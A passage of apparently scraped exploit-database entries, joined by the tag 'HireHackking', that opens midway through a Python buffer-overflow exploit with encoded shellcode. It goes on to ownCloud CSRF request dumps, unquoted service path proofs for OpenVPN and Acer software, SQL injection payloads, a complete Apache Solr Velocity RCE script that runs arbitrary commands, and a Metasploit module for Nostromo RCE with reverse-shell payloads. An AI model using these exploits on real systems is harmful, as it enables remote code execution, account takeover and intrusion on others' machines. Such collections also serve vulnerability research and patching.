"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP 
)

alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10
jump_short = "\x90\x90\xEB\x08"  # jump to 00129A44
pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in SkinMagic.dll
buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45"

try:
    f=open("shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery
# Date: 2019-10-31
# Exploit Author: Ozer Goker
# Vendor Homepage: https://owncloud.org
# Software Link: https://owncloud.org/download/
# Version: 10.3
# CVE: N/A

# Introduction
# Your personal cloud collaboration platform With over 50 million users
# worldwide, ownCloud is the market-leading open source software for
# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive
# and Google Drive, ownCloud offers real data security and privacy for you
# and your data.

##################################################################################################################################

# CSRF1
# Create Folder

MKCOL /remote.php/dav/files/user/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo=
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF2
# Delete Folder

DELETE /remote.php/dav/files/user/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI=
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF3
# Create User

POST /index.php/settings/users/users HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 39
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

username=test&password=&email=test@test



##################################################################################################################################

# CSRF4
# Delete User

DELETE /index.php/settings/users/users/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF5
# Create Group

POST /index.php/settings/users/groups HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

id=test


##################################################################################################################################

# CSRF6
# Delete Group

DELETE /index.php/settings/users/groups/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF7
# Change User Full Name

POST /index.php/settings/users/user/displayName HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

displayName=user1&oldDisplayName=user


##################################################################################################################################

# CSRF8
# Change User Email

PUT /index.php/settings/users/user/mailAddress HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

mailAddress=user1%40example.com


##################################################################################################################################

# CSRF9
# Change User Password


POST /index.php/settings/personal/changepassword HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

oldpassword=1234&personal-password=1&personal-password-clone=1


##################################################################################################################################

# CSRF10
# Change Language

POST /index.php/settings/ajax/setlanguage.php HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

lang=tr


##################################################################################################################################
HireHackking 
# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path
# Author: Sainadh Jamalpur
# Date: 2019-10-31
# Vendor Homepage: https://openvpn.net/
# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
# Version : PrivateTunnel v2.8.4
# Tested on: Windows 10 64bit(EN)
# CVE : N/A

# =====================================================
# 1. Description:
# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path.

#PoC
===========
C:\>sc qc ovpnagent
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ovpnagent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\OpenVPN
Technologies\PrivateTunnel\ovpnagent.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenVPN Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
# Version: 1.04
# Software Link: https://github.com/thejshen/contentManagementSystem.git
# Tested on: CentOS7

# GET parameter 'id' easy SQL Injection
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4' AND 5143=5143-- OWXt
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
HireHackking 
# Title: Apache Solr 8.2.0 - Remote Code Execution
# Date: 2019-11-01
# Author: @l3x_wong
# Vendor: https://lucene.apache.org/solr/
# Software Link: https://lucene.apache.org/solr/downloads.html
# CVE: N/A
# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template

# usage: python3 script.py ip [port [command]]
#                default port=8983
#                default command=whoami
# note:
# Step1: Init Apache Solr Configuration
# Step2: Remote Exec in Every Solr Node

import sys
import json
import time
import requests


class initSolr(object):

    timestamp_s = str(time.time()).split('.')
    timestamp = timestamp_s[0] + timestamp_s[1][0:-3]

    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def get_nodes(self):
        payload = {
            '_': self.timestamp,
            'indexInfo': 'false',
            'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores'

        try:
            nodes_info = requests.get(url, params=payload, timeout=5)
            node = list(nodes_info.json()['status'].keys())
            state = 1
        except:
            node = ''
            state = 0

        if node:
            return {
                'node': node,
                'state': state,
                'msg': 'Get Nodes Successfully'
            }
        else:
            return {
                'node': None,
                'state': state,
                'msg': 'Get Nodes Failed'
            }

    def get_system(self):
        payload = {
            '_': self.timestamp,
            'wt': 'json'
        }
        url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system'
        try:
            system_info = requests.get(url=url, params=payload, timeout=5)
            os_name = system_info.json()['system']['name']
            os_uname = system_info.json()['system']['uname']
            os_version = system_info.json()['system']['version']
            state = 1

        except:
            os_name = ''
            os_uname = ''
            os_version = ''
            state = 0

        return {
            'system': {
                'name': os_name,
                'uname': os_uname,
                'version': os_version,
                'state': state
            }
        }


class apacheSolrRCE(object):

    def __init__(self, ip, port, node, command):
        self.ip = ip
        self.port = port
        self.node = node
        self.command = command
        self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node

    def init_node_config(self):
        url = self.url + '/config'
        payload = {
            'update-queryresponsewriter': {
                'startup': 'lazy',
                'name': 'velocity',
                'class': 'solr.VelocityResponseWriter',
                'template.base.dir': '',
                'solr.resource.loader.enabled': 'true',
                'params.resource.loader.enabled': 'true'
            }
        }
        try:
            res = requests.post(url=url, data=json.dumps(payload), timeout=5)
            if res.status_code == 200:
                return {
                    'init': 'Init node config successfully',
                    'state': 1
                }
            else:
                return {
                    'init': 'Init node config failed',
                    'state': 0
                }
        except:
            return {
                'init': 'Init node config failed',
                'state': 0
            }

    def rce(self):
        url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom="
                          "%23set($x=%27%27)+"
                          "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+"
                          "%23set($chr=$x.class.forName(%27java.lang.Character%27))+"
                          "%23set($str=$x.class.forName(%27java.lang.String%27))+"
                          "%23set($ex=$rt.getRuntime().exec(%27" + self.command +
                          "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+"
                          "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end")
        try:
            res = requests.get(url=url, timeout=5)
            if res.status_code == 200:
                try:
                    if res.json()['responseHeader']['status'] == '0':
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                    else:
                        return 'RCE failed @Apache Solr node %s\n' % self.node
                except:
                    return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0'))

            else:
                return 'RCE failed @Apache Solr node %s\n' % self.node
        except:
            return 'RCE failed @Apache Solr node %s\n' % self.node


def check(ip, port='8983', command='whoami'):
    system = initSolr(ip=ip, port=port)
    if system.get_nodes()['state'] == 0:
        print('No Nodes Found. Remote Exec Failed!')
    else:
        nodes = system.get_nodes()['node']
        systeminfo = system.get_system()
        os_name = systeminfo['system']['name']
        os_version = systeminfo['system']['version']
        print('OS Realese: %s, OS Version: %s\nif remote exec failed, '
              'you should change your command with right os platform\n' % (os_name, os_version))

        for node in nodes:
            res = apacheSolrRCE(ip=ip, port=port, node=node, command=command)
            init_node_config = res.init_node_config()
            if init_node_config['state'] == 1:
                print('Init node %s Successfully, exec command=%s' % (node, command))
                result = res.rce()
                print(result)
            else:
                print('Init node %s Failed, Remote Exec Failed\n' % node)


if __name__ == '__main__':
    usage = ('python3 script.py ip [port [command]]\n '
             '\t\tdefault port=8983\n '
             '\t\tdefault command=whoami')

    if len(sys.argv) == 4:
        ip = sys.argv[1]
        port = sys.argv[2]
        command = sys.argv[3]
        check(ip=ip, port=port, command=command)
    elif len(sys.argv) == 3:
        ip = sys.argv[1]
        port = sys.argv[2]
        check(ip=ip, port=port)
    elif len(sys.argv) == 2:
        ip = sys.argv[1]
        check(ip=ip)
    else:
        print('Usage: %s:\n' % usage)
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nostromo Directory Traversal Remote Command Execution',
      'Description'    => %q{
          This module exploits a remote command execution vulnerability in
        Nostromo <= 1.9.6. This issue is caused by a directory traversal
        in the function `http_verify` in nostromo nhttpd allowing an attacker
        to achieve remote code execution via a crafted HTTP request.
      },
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module
          'sp0re', # original public exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-16278'],
          [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
        ],
      'Platform'      => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
      'Arch'  => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
      'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            {
                'Platform' => 'unix',
                'Arch'  => ARCH_CMD,
                'Type'  => :unix_memory,
                'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
            }
          ],
          ['Automatic (Linux Dropper)',
            {
                'Platform' => 'linux',
                'Arch'  => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
                'Type'  => :linux_dropper,
                'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
            }
          ]
        ],
      'DisclosureDate' => 'Oct 20 2019',
      'DefaultTarget' => 0,
      'Notes'         => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def check
    res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(target_uri.path),
      }
    )

    unless res
      vprint_error("Connection failed")
      return CheckCode::Unknown
    end

    if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/
      /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server']
      if Gem::Version.new(version) <= Gem::Version.new('1.9.6')
        return CheckCode::Appears
      end
    end

    return CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
      'headers' => {'Content-Length:' => '1'},
      'data'    => "echo\necho\n#{cmd} 2>&1"
      }
    )
  end

  def exploit
    # These CheckCodes are allowed to pass automatically
    checkcodes = [
      CheckCode::Appears,
      CheckCode::Vulnerable
    ]

    unless checkcodes.include?(check) || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    print_status("Configuring #{target.name} target")

    case target['Type']
    when :unix_memory
      print_status("Sending #{datastore['PAYLOAD']} command payload")
      vprint_status("Generated command payload: #{payload.encoded}")

      res = execute_command(payload.encoded)

      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
        print_warning('Dumping command output in full response body')

        if res.body.empty?
          print_error('Empty response body, no command output')
          return
        end

        print_line(res.body)
      end
    when :linux_dropper
      print_status("Sending #{datastore['PAYLOAD']} command stager")
      execute_cmdstager
    end
  end
end
HireHackking 
# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path
# Author: Gustavo Briseño
# Date: 2019-11-03
# Vendor Homepage: https://www.acer.com/
# Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429
# Version : Launch Manager 6.1.7600.16385
# Tested on: Windows 7 Home Basic 64bit
# CVE : N/A

# =====================================================
# 1. Description:
# Unquoted service paths in DsiWMIService have an unquoted service path.

#PoC
===========
C:\>sc qc DsiWMIService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DsiWMIService
        TYPE                                : 10  WIN32_OWN_PROCESS
        START_TYPE                   : 2   AUTO_START
        ERROR_CONTROL         : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Launch Manager\dsiwmis.exe
        LOAD_ORDER_GROUP :
        TAG                                  : 0
        DISPLAY_NAME              : Dritek WMI Service
        DEPENDENCIES               :
        SERVICE_START_NAME : LocalSystem

C:\>

#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.
HireHackking 
# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-03
# Vendor Homepage: https://openvpn.net
# Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi
